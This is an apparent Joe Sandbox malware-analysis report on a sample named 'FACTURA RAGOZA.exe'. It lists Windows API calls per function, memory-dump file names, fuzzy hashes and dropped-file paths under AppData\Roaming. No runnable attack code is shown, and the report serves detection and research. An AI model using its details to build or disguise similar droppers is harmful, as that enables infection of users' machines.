Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26

Function 0040597D Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6

Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
GetLastError.KERNEL32 ref: 0040549F

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69

Function 00405A49 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9

Function 00405A1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
Opcode Fuzzy Hash: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29

Function 00403F60 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 00403F72

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D

Function 00403F49 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29

Function 004030C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Non-executed Functions

Function 00405086 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004050E5
GetDlgItem.USER32(?,000003EE), ref: 004050F4
GetClientRect.USER32(?,?), ref: 00405131
GetSystemMetrics.USER32(00000002), ref: 00405138
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
ShowWindow.USER32(?,00000008), ref: 004051D4
GetDlgItem.USER32(?,000003EC), ref: 004051F5
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
GetDlgItem.USER32(?,000003F8), ref: 00405103

Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57

GetDlgItem.USER32(?,000003EC), ref: 00405246
CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
CloseHandle.KERNEL32(00000000), ref: 0040525B
ShowWindow.USER32(00000000), ref: 0040527E
ShowWindow.USER32(?,00000008), ref: 00405285
ShowWindow.USER32(00000008), ref: 004052CB
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
CreatePopupMenu.USER32 ref: 00405310
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
GetWindowRect.USER32(?,000000FF), ref: 00405345
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
OpenClipboard.USER32(00000000), ref: 004053AA
EmptyClipboard.USER32 ref: 004053B0
GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
GlobalLock.KERNEL32(00000000), ref: 004053C3
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
GlobalUnlock.KERNEL32(00000000), ref: 004053F0
SetClipboardData.USER32(00000001,00000000), ref: 004053FB
CloseClipboard.USER32 ref: 00405401

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69

Function 00404352 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004043A1
SetWindowTextA.USER32(00000000,?), ref: 004043CB
SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
CoTaskMemFree.OLE32(00000000), ref: 00404487
lstrcmpiA.KERNEL32(Space required: ,00429868), ref: 004044B9
lstrcatA.KERNEL32(?,Space required: ), ref: 004044C5
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7

Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C

Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA RAGOZA.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\FACTURA RAGOZA.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
Part of subcall function 00405F9A: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014

GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0

Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2

Strings

Space required: , xrefs: 004044B3, 004044B8, 004044C3
A, xrefs: 00404475
vs, xrefs: 0040460C
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 004044A2

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Space required: $vs
API String ID: 2624150263-3858289449
Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer, xrefs: 0040211D

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer
API String ID: 123533781-2528110863
Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
